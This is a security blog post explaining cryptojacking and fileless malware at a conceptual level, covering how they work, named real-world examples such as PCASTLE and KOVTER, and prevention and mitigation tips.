In the fast-paced world of today, it’s easy to overlook the looming threat malware has on our security. We often take for granted the functions that antivirus (AV) software provides and tend to ignore what happens in the background of our systems and processes. Behind the scenes, cyber attackers take advantage of this negligence, only to inflict damage and wreak havoc. For this reason, it’s crucial to peel back the layers of obfuscation between us and the malware that affects our digital security to better understand and prevent it.
Today, we’re going to do just that – step back, dig into some modern malware techniques, and hopefully come away armed with the knowledge we need to stay safe.
Cryptojacking – Mining in The Shadows
Cryptojacking is a relatively new form of malware, gaining prominence with the rise of cryptocurrency. It’s unique in that it does not seek to destroy or steal confidential data, but instead conceals itself in the hopes of hoarding computer resources.
How Does Cryptojacking Work?
To understand how cryptojacking works, it’s important to understand how people earn cryptocurrency. In simple terms, “mining” is the process by which transactions are verified and added to a blockchain, the underlying technology powering most cryptocurrencies. To use Bitcoin as an example – to get access to newly generated Bitcoin, miners compete to solve a cryptographic math problem.
Once the correct solution is found (often through lots of time and computing power), the miner broadcasts it to the network. The solution is verified and, if correct, the miner is rewarded with a newly created Bitcoin. Since this is essentially a race, it is in the miners’ best interest to have as much processing power as possible.
Cryptojacking takes advantage of this need for processing power by hijacking the system resources of an unsuspecting victim’s devices. The victim is normally unaware of this happening, as the “resource theft” is occurring in the background without noticeable disruption to the device’s normal functions.
Types of Cryptojacking
There are a couple of common forms of cryptojacking. The more traditional method involves a victim acquiring it through a suspicious email link or executable file. In this case, the malicious code is loaded directly into the victim’s computer and runs locally. The actual code that performs the mining can also be inserted into seemingly harmless applications or executables. As such, the victim will continue using the application normally, not suspecting that resources are being stolen behind the scenes.
Drive-by or Browser-Based Approach
Another form of attack is the “drive-by” or “browser-based” approach. These exploits work by embedding malicious JavaScript into a website. Whenever a user lands on that website, the code will run, and mining will start. This method of running malicious code on a website is less harmful to the victim’s resources since the code stops running as soon as they close the site.
However, it impacts every user who comes to the site. The user also may not realize that the website is still running the code, especially if it uses a hidden window like a pop-under that remains hidden under the taskbar.
Historically, browser-based cryptomining was often a conscious way to upscale revenue as an alternative to advertisements. The websites that employed this strategy did so with the consent of the user, ensuring that the mining didn’t affect user performance. In the context of cryptojacking, the code is often inserted because of a breach, and the owner of the website is unaware of what’s happening.
Fileless In-Memory Cryptojacking
The most dangerous of all is fileless in-memory cryptojacking. Once the malware reaches the system via a zero-day vulnerability or phishing, cryptojackers can use PowerShell to execute code remotely straight into memory, allowing them to bypass antivirus (AV) software. This form of cryptojacking can quickly turn into ransomware, as attackers can run remote commands for other purposes. It uses registry keys or scheduled tasks for persistence and propagation, allowing it to become a consistent and unrelenting threat.
Cryptojacking in the Wild
PCASTLE (also known as Beapy) is a cryptominer identified in December 2018. It was initially discovered in a supply chain attack targeting DriveTheLife, an application that “provided driver updates”. The domain from which DriveTheLife downloaded driver updates was being manipulated by a threat actor, downloading malicious payloads onto the victim’s computer.
PCASTLE uses Python and PowerShell to deliver the cryptominer itself and is considered a “worm-crypto miner combo”, with the ability to move laterally and exploit common system vulnerabilities, such as EternalBlue.
To maintain its stealthy nature, it also checks twice per second whether any processes from a list it deems “resource-intensive” are running – this list includes popular games, and the Task Manager itself, ensuring that the victim stays unaware of what’s happening.
GhostMiner is a fileless cryptominer – What does a “fileless” cryptominer entail? Stay tuned! – first observed in 2018. It weaponizes WMI objects for its persistence. Interestingly, it also disables other cryptojacking processes it detects to maximize its efficiency.
Prevention & Mitigation Strategies
Despite cryptojacking being hard to detect, there are a couple of best practices that will minimize the risk of infection:
- Staying up-to-date → ensure that all the necessary software/device patches and fixes
are implemented minimizes the risk of known zero-day vulnerabilities being exploited, to
prevent attackers from gaining access to your systems. - Analyzing your emails → always triple-check who you’re receiving emails from (Does the
domain have a typo?) and what they want from you (Are they sending you an
unexpected attachment? Are they asking you to click a link?) - Avoid suspicious websites → Sometimes the best thing to do is to trust your gut. A good
safety precaution is having an ad-blocker such as uBlock Origin installed, which should
automatically flag popups and websites other users have flagged as unsafe.
As a rule of thumb, if you notice any symptoms and suspect you might be infected, performing a clean factory reset is the best way to ensure your systems are clean.
Fileless Attacks – Malware Beyond Files
Fileless malware is an emerging threat – it’s complex and evasive, exploiting pre-installed programs to infiltrate malicious code. The traditional signature analysis is unable to detect it for this reason.
How Does Fileless Malware Work?
Fileless malware is designed to run in system memory, leaving no artifacts on the victim’s hard drive. Because it runs in-memory, its existence on the system lasts until the system is rebooted – persistence techniques, however, allow it to maintain its presence for much longer. Attackers can gain access to the system through several ways, including zero-day vulnerabilities in pre-installed tools, phishing, or stolen credentials.
Once the attacker has gained access to the system, remaining there is imperative. Oftentimes, persistence is acquired by injecting malicious code into unusual locations associated with the operating systems or common utilities (the Windows registry, WMI tasks, SQL tables or Scheduled Tasks are common locations). The attacker is then able to exfiltrate data and use it for nefarious purposes, including ransomware and the like.
Types of Fileless Malware
Fileless malware can be divided into two main categories, based on the execution method: RAM-resident (or Memory-resident), and Script-based.
Memory-resident malware executes in RAM, allowing it to bypass most antivirus solutions. Antivirus checks are typically done when a new process starts – this is avoided entirely by injecting malicious code into processes already running on the system. Since there are no physical artifacts associated with it, signature-based detection is also avoided.
Script-based malware specifically exploits vulnerabilities present in Microsoft Office and PowerShell. They come in the form of malicious “scripts”, which are interpreted by Windows. They can also be obfuscated and split up to avoid signature and behavioral detection.
Fileless Malware in the Wild
Poweliks emerged in early 2014 and is the evolution of the file-based threat known as Wowliks. Once Poweliks has infected their victim’s computer, it acts as a click-fraud botnet that visits web pages in a hidden browser that displays advertisements. These advertisements can have malicious content on their own, so the infection often spirals once Poweliks starts running. It lives in the registry and uses rundll32.exe to execute commands.
KOVTER was the number one source of crimeware infections in May 2018. It initially started as police ransomware and eventually evolved into an evasive fileless malware. Its main infection method is via attachments coming from macro-based spam – once the malicious attachment is clicked, the malware installs itself into the registry with code that performs KOVTER’s processes. Once all the scripts associated with the malware are set up, a watchdog process is created, which continuously monitors and confirms the existence of these scripts.
Prevention & Mitigation Strategies
- Policies that protect against email threats should be implemented, lowering the risk of an attacker being able to infect a system.
- For memory-resident malware, an antivirus solution should be able to analyze RAM captures, as well as dump any malicious processes – for further analysis manual inspection (with a tool such as Volatility) is recommended.
- Detection by monitoring the behavior of the system → check for suspicious events and processes, monitoring all new PowerShell processes and other odd behavior.
About Author & Author Note
Ana Batranović is one of the youngest stars in the UN1QUELY sky. An energetic penetration tester, ethical hacker, and certified Red Team operator, she is eagerly broadening her cybersecurity and tech knowledge around the clock. Also, a little note from the author herself:” Thank you for reading this blog! I had a lot of fun making it, and I hope you’ve learned something new.”